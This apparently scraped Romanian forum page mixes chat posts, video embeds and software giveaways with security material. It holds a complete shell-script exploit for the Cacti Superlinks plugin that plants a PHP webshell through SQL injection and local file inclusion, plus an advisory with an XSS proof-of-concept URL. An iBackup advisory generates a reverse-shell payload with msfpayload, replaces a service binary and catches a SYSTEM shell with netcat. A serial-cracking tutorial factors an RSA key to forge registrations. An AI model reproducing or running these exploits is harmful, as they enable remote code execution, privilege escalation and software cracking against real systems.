Aerosol

Nu e acelasi lucru omule, nu vezi?

Sa traduci din romana in engleza, daca e asa te pot ajuta si eu.

@Cronicles <center> Partea 1 <iframe width="700" height="360" scrolling="no" frameborder="0" src="http://videomega.tv/iframe.php?ref=XUHbVFNIQNNQINFVbHUX&width=700&height=360" allowFullScreen></iframe> Partea 2 <iframe width="700" height="360" scrolling="no" frameborder="0" src="http://videomega.tv/iframe.php?ref=YeAgBXZdDIIDdZXBgAeY&width=700&height=360" allowFullScreen></iframe> Partea 3 <iframe width="700" height="360" scrolling="no" frameborder="0" src="http://videomega.tv/iframe.php?ref=KOUQYcXIHTTHIXcYQUOK&width=700&height=360" allowFullScreen></iframe> </center> view-source:http://www.topvideohd.com/2013/05/avatar-2009-online-subtitrat-in-romana.html

DxO Optics Pro 8 Elite is a photo and image processing program that enhances and improves your photos and images using advanced algorithms and techniques — automatically. Want more features? Get DxO Optics Pro 10 Elite with free updates, the latest and greatest version of DxO Optics Pro! Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 41 days 22 hrs 21 mins Free DxO Optics Pro 8 Elite (100% discount)

Ashampoo Internet Accelerator 3 is a program that aims to do things: boost your connection speed by optimizing internet-related settings and clean your internet-related privacy traces. Want more features? Upgrade to Ashampoo WinOptimizer 11, which has all the internet optimization and privacy cleaning features of Ashampoo Internet Accelerator 3 plus more. Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 2 days 22 hrs 24 mins Free Ashampoo Internet Accelerator 3 (100% discount)

Bitdefender Total Security 2015 is an all-in-one security package for your computer. It provides protection against malware (viruses, trojans, spyware, adware, etc.), has a built-in firewall, helps guard online transactions, protects your privacy, and more. Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 1 day 22 hrs 24 mins Free 1-Year License Bitdefender Total Security 2015 (100% discount)

@ICEBREAKER101010 asta sa crezi tu, ca daca ai linux nu au ce faca bla,bla,bla, nu-s asa de prostii. Omule se vede ca nu ai citit/inteles aceasta stire, mai citeste-o o data, de doua, de zece ori pana o sa o intelegi, hai sa nu facem offtopic inceteaza cu aberatiile...

@Cronicles lasa-mi link cu acel site.

Researchers at Google have uncovered several serious vulnerabilities in the Network Time Protocol and experts warn that there are exploits publicly available for some of the bugs. The vulnerabilities are present in all versions of NTP prior to 4.2.8 and include several buffer overflows that are remotely exploitable. The NTP is a protocol that’s used to synchronize the time on servers across networks. It’s ubiquitous and that fact has made it a useful tool for attackers in DDoS attacks in recent years. Attackers have taken advantage of a weakness in NTP to amplify DDoS attacks. “The reason has to do with the amplification factor,” said Arbor Networks solutions architect Gary Sockrider in April. “With NTP reflection attacks, you get 1000 times the amplification; 1000 times the size of the query is reflected back. There’s more cause for alarm with NTP attacks because attackers get a better response rate.” The flaws disclosed today in NTP are more worrisome. They put servers running older versions of the protocol at risk of remote code execution. “Google Security Team researchers Neel Mehta and Stephen Roettger have coordinated multiple vulnerabilities with CERT/CC concerning the Network Time Protocol (NTP). As NTP is widely used within operational Industrial Control Systems deployments, NCCIC/ICS-CERT is providing this information for US Critical Infrastructure asset owners and operators for awareness and to identify mitigations for affected devices,” an advisory from ICS-CERT says. “These vulnerabilities could be exploited remotely. Exploits that target these vulnerabilities are publicly available.” The advisory from NTP.org says that a single packet is enough to exploit any of the buffer overflow vulnerabilities. “A remote attacker can send a carefully crafted packet that can overflow a stack buffer and potentially allow malicious code to be executed with the privilege level of the ntpd process,” the advisory says. Source

@Cronicles sa zicem ca asta e video-ul tau: http://videomega.tv/?ref=AJWOLaJQKbbKQJaLOWJA# dai pana in josul pagini unde scrie

#!/bin/sh ############## # Exploit Title: Cacti - Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection # Date: 19/12/2014 # Exploit Author: Wireghoul # Software Link: http://docs.cacti.net/plugin:superlinks # Identifiers: CVE-2014-4644, EDB-ID-33809 # Exploit explanation through inline comments # Patch provided at the end # # This is the year where hope fails you -- Slipknot: Pulse of the maggots # ############## echo -e "\e[32m *-*, \e[31m ___________" echo -e "\e[32m ,*\/|\`| ; \e[31m /.'_______\`.\\" echo -e "\e[32m \\' | |'; *, \e[31m /( (_______\`-'\\" echo -e "\e[32m \ \`| | ;/ ) \e[31m \`.\`.______ \.'" echo -e "\e[32m : |'| , / \e[31m \`..-.___>.'" echo -e "\e[32m :'| |, / \e[31m \`.__ .'\e[0m" echo -e " _________\e[32m:_|_|_;\e[0m_______________\e[31m\`.'\e[0m_______[Wireghoul]___" echo -e " CACTI SUPERLINKS PLUGIN 1.4-2 REMOTE CODE EXECUTION PoC" echo if [ -z $1 ]; then echo -e "Usage $0 <superpluginurl>\n $0 http://example.com/cacti/plugins/superlinks/superlinks.php\n"; exit 2; fi # This exploit is a second order LFI through SQLI, so first we must write some data to disk # Luckily the application logs all sort of stuff, so lets poison the application log # The reason for this is manyfold, read on. curl --silent "$1?id=SHELL<?php+passthru(\$_GET\[c\])+?>LLEHS<?php+exit+?>" > /dev/null # Now lets analyse the vulnerability: # superlinks.php:21:if (isset($_GET['id'])) { # superlinks.php:22: $pageid=$_GET['id']; # superlinks.php:23:} # superlinks.php:24: # superlinks.php:25:$page = db_fetch_row("SELECT DISTINCT # superlinks.php:26: id, # superlinks.php:27: title, # superlinks.php:28: style, # superlinks.php:29: contentfile # superlinks.php:30: FROM (superlinks_pages, superlinks_auth) # superlinks.php:31: WHERE superlinks_pages.id=superlinks_auth.pageid # superlinks.php:32: AND id=" . $pageid . " # This is where the injection occurs, we can now union select 1,2,3,4 -- ftw # However the real fun occurs a few lines later # superlinks.php:57: $my_file = $config["base_path"] . "/plugins/superlinks/content/" . $page['contentfile']; # superlinks.php:58: # superlinks.php:59: if (file_exists($my_file)) { # superlinks.php:60: @InClude_once($my_file); # We can now include a file of our choosing (LFI) based on the data returned from the SQLi # There are only a few problems: # * We cannot use strings/quotes as magic quotes are usually on # * We do not know the local path for the LFI # * Usual tricks like /proc/self* have been patched # * Database server and web server may be different hosts # Lets solve the easy one first, we dont need to quote our strings, hex encoding works great # The second one is a little trickier, we can brute force LFI locations... or # We can dynamically locate a file path which is stored in the database and present on the webserver # $ mysqldump cacti | grep '\.log' # INSERT INTO `settings` VALUES ('path_php_binary','/usr/bin/php'),('path_rrdtool','/usr/bin/rrdtool'),('poller_lastrun','1414565401'),('path_webroot','/usr/share/cacti/site'),('date','2014-10-29 17:50:02'),('stats_poller','Time:0.1182 Method:cmd.php Processes:1 Threads:N/A Hosts:2 HostsPerProcess:2 DataSources:0 RRDsProcessed:0'),('stats_recache','RecacheTime:0.0 HostsRecached:0'),('path_snmpwalk','/usr/bin/snmpwalk'),('path_snmpget','/usr/bin/snmpget'),('path_snmpbulkwalk','/usr/bin/snmpbulkwalk'),('path_snmpgetnext','/usr/bin/snmpgetnext'),('path_cactilog','/var/log/cacti/cacti.log'),('snmp_version','net-snmp'),('rrdtool_version','rrd-1.4.x'),('superlinks_tabstyle','0'),('superlinks_hidelogo','0'),('superlinks_hideconsole','0'),('superlinks_db_version','1.4'),('auth_method','1'),('guest_user','guest'),('user_template','0'),('ldap_server',''),('ldap_port','389'),('ldap_port_ssl','636'),('ldap_version','3'),('ldap_encryption','0'),('ldap_referrals','0'),('ldap_mode','0'),('ldap_dn',''),('ldap_group_require',''),('ldap_group_dn',''),('ldap_group_attrib',''),('ldap_group_member_type','1'),('ldap_search_base',''),('ldap_search_filter',''),('ldap_specific_dn',''),('ldap_specific_password',''); # $ ls -la /var/log/cacti/cacti.log # -rw-r----- 1 www-data www-data 5838 Oct 29 17:50 /var/log/cacti/cacti.log # $ tail /var/log/cacti/cati.log # <snip> ERROR: SQL Assoc Failed!, Error:'1064', SQL:"SELECT graph_templates.id, graph_templates.name FROM (graph_local,graph_templates,graph_templates_graph) WHERE graph_local.id=graph_templates_graph.local_graph_id AND graph_templates_graph.graph_template_id=graph_templates.id AND graph_local.host_id=1 AND graph_templates.id=12 select 1,2,3,4 -- GROUP BY graph_templates.id ORDER BY graph_templates.name" # WINRAR! # We can now include the poisoned log file by fetching the log path from the database # and prepending it with the normal directory traversal pattern ../../../ using concat() # We traverse 8 deep, that's usually enough echo -ne "Dropping into shell, type exit to quit.\ncactishell> " while read line; do if [ "$line" == "exit" ]; then exit fi comand=`echo -n $line | sed -e's/ /+/g'` curl --silent "$1?id=123+union+select+1,2,3,concat(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f,value)+from+settings+where+name=0x706174685f63616374696c6f67+--+-&c=$comand" | \ sed -n '/SHELL/, $p' | \ sed -e 's/.*SHELL//' |\ sed '/LLEHS/, $d' echo -n "cactishell> " done # Proposed patch # Vendor has a patch in a SVN repo somewhere: # [url]http://bugs.cacti.net/bug_view_advanced_page.php?bug_id=2475[/url] # Yet has not made the patch available, or responded to requests to do so: # [url]http://forums.cacti.net/viewtopic.php?t=53711[/url] #--- superlinks.php 2014-12-18 02:05:37.706013833 -0500 #+++ superlinks.php 2014-12-18 02:05:09.694014497 -0500 #@@ -19,7 +19,7 @@ # # $pageid = 0; # if (isset($_GET['id'])) { #- $pageid=intval($_GET['id']); #+ $pageid=$_GET['id']; # } # # $page = db_fetch_row("SELECT DISTINCT Source

SEC Consult Vulnerability Lab Security Advisory < 20141219-0 > ======================================================================= title: XSS & Memory Disclosure product: NetIQ eDirectory NDS iMonitor vulnerable version: 8.8 SP8, 8.8 SP7 fixed version: 8.8 SP8 HF 4, fix available for versions 8.8 SP7 (8.8.7.4 HF 4, 8.8.7.6 HF 3) CVE number: CVE-2014-5212, CVE-2014-5213 impact: High homepage: https://www.netiq.com/ found: 2014-10-29 by: W. Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ----------------------------- "eDirectory(TM) is a full-service, secure LDAP directory providing incredible scalability and an agile platform to run your organization's identity infrastructure and multi-platform network services." URL: https://www.netiq.com/products/edirectory/ Business recommendation: ------------------------ An attacker without an account on the NetIQ eDirectory NDS iMonitor is able to gain administrative access by luring an authenticated administrator to visit an attacker-controlled web site. Moreover, an authenticated attacker is able to retrieve internal data which potentially contains sensitive data. As the NetIQ eDirectory is often used to maintain a centralized user database it is a very attractive target for an attacker. By compromising this system, an attacker may be able to conduct further attacks on other systems. SEC Consult recommends to immediately conduct a full security review of this software, especially if used as a centralized user database. Vulnerability overview/description: ----------------------------------- 1) Memory Disclosure (CVE-2014-5213) Using crafted HTTP requests an administrative user can retrieve parts of the virtual memory from the service. This potentially discloses secret data like passwords. 2) Reflected Cross Site Scripting (XSS, CVE-2014-5212) A reflected cross site scripting vulnerability was identified. An attacker could take over the user account of a valid administrator. Proof of concept: ----------------- 1) Memory Disclosure (CVE-2014-5213) When accessing the following URL as an authenticated user, parts of the virtual memory can be retrieved: https://<host>:8030/nds/files/opt/novell/eDirectory/lib64/ndsimon/public/images 2) Reflected Cross Site Scripting (XSS, CVE-2014-5212) The following URL demonstrates a reflected XSS flaw: https://<host>:8030/nds/search/data?scope=st&rdn=%3C/script%20%3E%3Cscript%20%3Ealert%28%22XSS%22%29%3C/script%20%3E Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in the NetIQ eDirectory NDS iMonitor version 8.8 SP8, which was the most recent version at the time of discovery. Vendor contact timeline: ------------------------ 2014-10-29: Contacting security@netiq.com, sending responsible disclosure policy and PGP keys 2014-10-29: Vendor redirects to security@novell.com, providing PGP keys through Novell support page 2014-10-30: Sending encrypted security advisory to Novell 2014-10-30: Novell acknowledges the receipt of the advisory 2014-11-18: Novell: the vulnerabilities have been fixed by development; the patches will be release end of November 2014-12-08: Novell: the release has been pushed to Dec. 8th 2014-12-09: Novell: the release 8.8.8.4 should be released tomorrow; The hotfix for 8.8.7.6 is still pending 2014-12-17: Verifying release of advisory; asking whether patches have been released 2014-12-18: Novell: Patches have been released 2014-12-19: Coordinated release of security advisory Solution: --------- Update to the release 8.8.8.4 or apply fix for versions 8.8 SP 7. Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF W. Ettlinger / @2014 Source

Document Title: =============== iBackup v10.0.0.45 - Privilege Escalation Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1382 Release Date: ============= 2014-12-18 Vulnerability Laboratory ID (VL-ID): ==================================== 1382 Common Vulnerability Scoring System: ==================================== 6.2 Product & Service Introduction: =============================== With IBackup, you can backup/restore interactively or schedule regular online backups for Windows desktops, laptops and servers. It has a simple, user- friendly interface coupled with powerful scheduling and logging features. IBackup automatically selects critical data (Desktop, Music, Pictures, Videos, Documents, Windows Mail, Favourites) for backup. Advanced features include Open file Backup, System State backup, MS SQL Server, MS Exchange Server, Hyper-V, MS SharePoint Server and Oracle Server backups. (Copy of the Vendor Homepage: https://www.ibackup.com/ibwin/downloads/IBackupsetup.exe ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a a local privilege escalation vulnerability in the official Pro Softnet Corporation iBackup v10.0.0.45 software. Vulnerability Disclosure Timeline: ================================== 2014-12-18: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Pro Softnet Corporation Product: iBackup - Server Software 10.0.0.45 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local privilege escalation vulnerability has been discovered in the official iBackup v10.0.0.45 software. The vulnerability allows local attackers to gain higher access privileges by execution of arbitrary codes. The `ibservice` service for windows could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user`s code would execute with the elevated privileges of the application. The security risk of the privilege escalation vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.2. Exploitation of the vulnerability requires a local privileged systen user account without user for interaction. Successful exploitation of the arbitrary code execution vulnerability results in software- or system compromise. Proof of Concept (PoC): ======================= The vulnerability can be exploited by local attackers with low privileged or restricted system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. --- PoC Session Logs --- C:\Users\s-dz\Desktop>sc qc ibservice [SC] QueryServiceConfig réussite(s) SERVICE_NAME: ibservice TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\IBackupWindows\ib_service.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IBackup Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem* - C:\Users\s-dz\Desktop>sc qc ibservice [SC] QueryServiceConfig réussite(s) SERVICE_NAME: ibservice TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\IBackupWindows\ib_service.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IBackup Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem - C:\Users\s-dz\Desktop>accesschk.exe -dqv "C:\Program Files\IBackupWindows\" C:\Program Files\IBackupWindows Medium Mandatory Level (Default) [No-Write-Up] RW Tout le monde FILE_ADD_FILE FILE_ADD_SUBDIRECTORY FILE_LIST_DIRECTORY FILE_READ_ATTRIBUTES FILE_READ_EA FILE_TRAVERSE FILE_WRITE_ATTRIBUTES FILE_WRITE_EA DELETE SYNCHRONIZE READ_CONTROL RW NT SERVICE\TrustedInstaller FILE_ALL_ACCESS RW AUTORITE NT\SystÞme FILE_ALL_ACCESS RW BUILTIN\Administrateurs FILE_ALL_ACCESS R BUILTIN\Utilisateurs FILE_LIST_DIRECTORY FILE_READ_ATTRIBUTES FILE_READ_EA FILE_TRAVERSE SYNCHRONIZE READ_CONTROL ############## PROOF C:\Users\s-dz\Desktop>net user s-dz Nom d'utilisateur s-dz Nom complet s-dz Commentaire Commentaires utilisateur Code du pays 000 (Valeur par défaut du système) Compte : actif Oui Le compte expire Jamais Mot de passe : dernier changmt. 18/12/2014 01:12:55 Le mot de passe expire Jamais Le mot de passe modifiable 18/12/2014 01:12:55 Mot de passe exigé Oui L'utilisateur peut changer de mot de passe Oui Stations autorisées Tout Script d'ouverture de session Profil d'utilisateur Répertoire de base Dernier accès 18/12/2014 06:04:49 Heures d'accès autorisé Tout Appartient aux groupes locaux *Utilisateurs Appartient aux groupes globaux *None La commande s'est terminée correctement. C:\Users\s-dz\Desktop> root@samir:~# msfpayload windows/shell_reverse_tcp lhost='192.168.1.5' lport='4433' X > C:\Users\s-dz\Desktop\evil-ZDserv.exe C:\Users\s-dz\Desktop>copy evil-ZDserv.exe "C:\Program Files\IBackupWindows\ib_service.exe" Remplacer C:\Program Files\IBackupWindows\ib_service.exe (Oui/Non/Tous) : o 1 fichier(s) copié(s). e will open cmd with administrator for start service ibservice C:\Users\s-dz\Desktop>sc start ibservice now nc ... (user) C:\Users\s-dz\Desktop>nc.exe -lvp 4433 listening on [any] 4433 ... connect to [192.168.1.5] from s-dz [192.168.1.5] 16040 Microsoft Windows [version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. Tous droits réservés. C:\Windows\system32>whoami whoami autorite nt\système C:\Windows\system32> Security Risk: ============== The security risk of the of the local privilege escalation software vulnerability in the root path is estimated as high. (CVSS 6.2) Credits & Authors: ================== Hadji Samir S-dz@hotmail.fr Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

@AndreiMihai nu o sa reusesti sa faci nimic cu cei 1.200 euro, daca ar fi asa usor la toate...

Introduction Hopefully you are familiar with Assembly language and have some little knowledge on how to use reverse engineering tools such as Debuggers, Disassemblers, PE Analyzers, etc. This article will only concentrate on the RSA cryptosystem and how to reverse it to get a valid key for your name. We will be targeting a challenge made especially for this tutorial to demonstrate how to do that. Tools Needed Assuming you’ve already got the required knowledge on how to use reverse engineering tools, these are the essential tools for this article (the download links are in the bottom): The target file (CryptoChallenge1.exe) IDA (Interactive Disassembler): Disassembler for computer software which generates assembly language source code from machine-executable code. OllyDBG: An x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. PEiD: PE analyzes tool, detects most common packers, cryptors and compilers for PE files, it also detects hashes and cryptographic algorithms used in the PE file. RE-SIGS: IDA signature file to detect libraries used by programs. GODUP: OllyDBG plugin to load IDA signature files. RSA-Tool: Useful for generation of key pairs, encryption/decryption and also integer factorization (and that’s what we will use it for). TiBiNuCa: A Tiny Big Number Calculator (requires dotNetFx4). What is RSA? RSA is a public-key cryptosystem. It was developed in 1977 by Ronald Rivest, Adi Shamir and Leonard Adleman. The fact that it’s a public-key cryptosystem means that it uses a public and a private key for the encryption/decryption of data. Its strength lies in the integer factorization problem (the larger the number, the harder and longer it will take to factorize) commonly known as the RSA Problem. RSA uses the following parameters: P: 1st large prime number. Q: 2nd large prime number. E: Public Exponent. N: Public Modulus. D: Private Exponent. Key generation Choose a key length (measured in bits). Generate the two random prime numbers P and Q. Choose a public exponent E such that GCD(E, (P-1)*(Q-1))==1), the most commonly used number is 65537. Compute the Public Modulus N = P * Q. Determine the Private Exponent (D) using the Modular multiplicative inverse formula D=E^(-1) mod ((P-1)*(Q-1)). The symbol (^) is used as the Exponent and not the XOR operator. (Mod) means modulo/modulus in computing and is an operation that finds the remainder of the division of one number by another. D must be kept private and must never be published! Alongside P and Q. Encryption To encrypt a message (M) (where M < N), we would use the following formula: C = M ^ E mod N Decryption To decrypt a given cipher © we would use the following formula: M = C ^ D mod N Example (in base 16) By following the steps above: Let’s choose a Keysize: 32 bits (which is totally unsecure). P = 2F6DB Q = 19CD3 E = 10001 (base 16 of 65537). N = P*Q = 4C7B9EA81 D = E^(-1) mod ((P-1)*(Q-1)) = 10001^(-1) mod ( (2F6DB-1) * (19CD3-1) ) = 10001^(-1) mod (2F6DA * 19CD2) = 10001^(-1) mod (4C7B556D4) = 72C6E47D That was calculated using TiBiNuCa: Now that we have our key pairs, we can encrypt our message: M = InfoSec which equals 49 6E 66 6F 53 65 63 in base 16. And since M > N we can split M into blocks smaller than N (M<N) as follows: 496E666F ^ 10001 mod 4C7B9EA81 = 143B30CF8 00536563 ^ 10001 mod 4C7B9EA81 = 380323BEB C = 143B30CF8380323BEB Now in order to decrypt the above cipher we should have the Private Exp (D) but what happens if we don’t! That’s where the factorization comes. That’s the job of RSA-Tool. (We’ll see how to do Factor N later). 143B30CF8 ^ 72C6E47D mod 4C7B9EA81 = 496E666F 380323BEB ^ 72C6E47D mod 4C7B9EA81 = 536563 M = 496E666F536563 = InfoSec. Target analyses Let’s try to apply all of the above in our challenge. I always check the target before everything, so that’s what we will do. Open up the target “CryptoChallenge1.exe” and Type any Name/Serial, I’ve typed my name, and for the serial I had to make many tries before it gave me that message “SERiAL STATUS: UNREGiSTERED” (the target checks for the serial’s length). Now we analyze our target to see if it’s packed/protected. As you can see, the analysis shows it was compiled using MASM32 / TASM32. But the crypto analysis using KANAL shows the target has some crypto inside (MD5 and BigLib: an assembly bignum library) Alright, now that we know what we’re dealing with, we will use IDA to extract these cryptos’ signatures from our target. To do that you should have the sig file “RE-SIGS” (download link in the bottom). PS: Before opening IDA, you should copy the signature file “RE-SIGS” in the folder IDAsig. Open the target in IDA and go to menu View > Open subviews > Signatures or just press Shift+F5. A list of applied library modules shows up. To apply a new signature, you can either press “Ins” or right-click > Apply new signatures. A new window will show up. Choose RESIGS and click OK. You will be able to see the changes in the functions window. 33 functions were applied, which means it has found the crypto algorithms and libraries and has given them their real names. Now we will export this result so that we can use it in our debugger. To do that, go to File > Produce file > Create MAP file as shown below: Save your file in a place you can remember, and leave the MAP file options as they are, as shown below (just click OK). Now that we have our map file, let’s debug. PS: Before opening OllyDBG you should put the plugin “GODUP Plugin” in the plugins section of the debugger you’re using, because that’s what we will be using to import our map file. Fire up the target file into OllyDbg and go to: Plugins > GODUP Plugin > Map Loader > Load labels And choose the map file you’ve saved before. The code is easy and simple, there are the initial API’s that load the PE file and after that there is GetDlgItemTextA (gets a text from an editbox/textbox and puts it in a buffer). Let’s put a breakpoint on that API and see what it really gets (simple click on address 0040107A and press F2). The tracing shows that the API is used to get the typed name. The target then checks if a name was typed, or it will show a text saying “NAME STATUS : NO NAME”, after that it checks if the length of the name is longer than 15 (CMP EAX,0F) and shorter than 3 (CMP EAX,3). If the name is longer than 3 and shorter than 15, it jumps to another GetDlgItemTextA API that gets the typed serial and does the same as for the name checks, except that the length must not be longer than 64 (CMP EAX,40) and not shorter than 63 (CMP EAX,3F). If everything is good, it will jump to address 0x40115A, which calls another address: CALL 0×401189. What might that address (00401189) contain? Let’s go check it out, shall we! The address sends us to the challenge’s RSA routine shown below: The tracing of that function shows that: lstrlenA at 0x40118E is used to get the length of our name, and then that length is moved to EBX. The three following calls (MD5Init, MD5Update and MD5Final) generate the MD5 hash for the name. That hash is then converted to Hexadecimal using HexEncode at 0x4011B2 and is put in address 0×407847. The calls (0x4011B9, 0x4011C5, 0x4011D1 and 0x4011DD) reference to BigCreate. This API is used by BigLib to create a bignumber and initializes it with the value InitValue. The three next calls (0x4011F4, 0×401206 and 0×401218) reference to BigIn, which is used to fill the given bignumber with the null-terminated string in base (16 in this case). Here is an example of that function: PUSH output // our bignumber buffer PUSH 16 // base PUSH input // (typed serial, public modulus n, public exponent e) CALL _BigIn Now we have: 0x4083F8 = Serial in bignum. 0×408400 = Public Modulus (N) in bignum. 0×408404 = Public Exponent (E) in bignum. N = 8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D E = 10001 Next is the call at 0×401235 is a reference to the function BigPowMod, which is the encryption formula, used as follows: 0x4083FC = 0x4083F8 ^ 0×408404 mod 0×408400 or C=Serial^E mod N After that, a call at 0×401247 to BigOut function. It is the opposite of BigIn, convert from bignumber to base 16 string. The result is put in 0x407C47. Next comes the algorithm from 0x40124C to 0x40126E which has a loop that compares each character from 0×407847 (md5 hash of our name) with each character from 0x407C47 (our Serial). It is easy to make it accept any serial just by patching the JNZ at 0×401266 into NOP’s. But that’s not ideal. The JNZ at 0×401266 inside the loop checks if two characters are equal, if not it jumps to address 0×401290 that has a SetDlgItemTextA which outputs “SERiAL STATUS: UNREGiSTERED”, or it doesn’t jump and shows “SERiAL STATUS: REGiSTERED”. After each SetDlgItemTextA call, there are two calls (CALL 0x4012B0) and (CALL 0x4012DE). 0x4012B0 is a function that has three calls to RtlZeroMemory which is used to clear the data. 0x4012AA is a function that has four calls which reference to BigDestroy. It destroys the bignums that were created by BigCreate. This is what we know so far: The Name must be longer than 3 and shorter than 15 characters. The Serial must contain either 63 or 64 characters. N = 8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D E = 10001 The target compares the MD5 hash of the Name with the result of the BigPowMod (C=Serial^E mod N). The Public Exponent N is 256 bits. The serial should be in base 16. Alright, now we need to reverse C=Serial^E mod N into M=C^D mod N (remember RSA’s Encryption/Decryption formulas!) so that we can get a valid serial. For that we need to factor N to get the Private Exponent D. Load up RSA-Tool and copy the N into the Modulus N textbox (to get the keysize click Exact size) and click Factor N and wait until it finds P and Q. This will take a while depending on the computer you’re using (it took 1h in my computer). Once the tool finishes factoring, you will see P and Q textboxes filled: P = 960A589F7B9AA6E2FBF05A5F5E507465 Q = E5109FD956BC44F85A6B0CF071A22DD9 Now click “Calc. D.” D = 82CC4CBC47FC65C57814EAEABD128AF6DEB2475AE59DF66F78C90BA1924D57 C1 Now that we have our Private Exponent, let’s calculate our valid serial: We know that the encryption formula is: C = Serial ^ E mod N And: C must be equal to MD5(NAME) which means C=MD5(NAME) So the decryption formula must be: Serial = C ^ D mod N Let’s try that out: NAME = Jamal Chahir C = MD5(NAME) = 4D945493477571DE563E281CA4145EB9 D = 82CC4CBC47FC65C57814EAEABD128AF6DEB2475AE59DF66F78C90BA1924D57C1 N = 8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D Serial = C ^ D mod N The calculation in TiBiNuCa gives us the following result as you can see below: 20F9C3683546ECDBF4F4469525B1DE915056F81E6708F78B7210858E40D25416 Trying that on the challenge gives us the right message. Conclusion In this article, I have shown you how the RSA cryptosystem works and how to reverse it. I hope all of this was clear enough and that you’ve learned something new from it. Download links: IDA : https://www.hex-rays.com/products/ida OllyDBG: OllyDbg v1.10 PEiD: PEiD Download - Softpedia RSA-Tool: https://tuts4you.com/download.php?view.455 RE-SIGS: https://tuts4you.com/download.php?view.3407 GODUP: https://tuts4you.com/download.php?view.54 TiBiNuCa: https://www.dropbox.com/s/4dipnjrlggrpz1w/TiBiNuCa.rar?dl=0 Target: https://www.dropbox.com/s/4va2kyqyd729hjd/CryptoChallenge1.rar?dl=0 Sources: en.wikipedia.org/wiki/RSA_(cryptosystem)

Nu ar fi chiar ok. Sa presupunem ca eu "vand un site" si nu am reusit sa-l vand in timp de 2 saptamani, s-au acumulat deja multe posturi iar al meu nu se mai vede. In prezent se foloseste "UP" daca s-ar intampla chestia asta topicul ar ramane uitat, plus ca o sa le vina idee baietilor sa isi faca conturi pentru com: Gen: Contul meu e Grigore postez ceva si dupa 2 saptamani fac cont Adrian si postez "Mai e valabila oferta?" ar fi aiurea.

Cum ai putea sa afli tu numele hamsterului cu ajutorul unui backdoor? doar nu are numele hamsterului prin pc sau daca e pus pe login nu are parola:

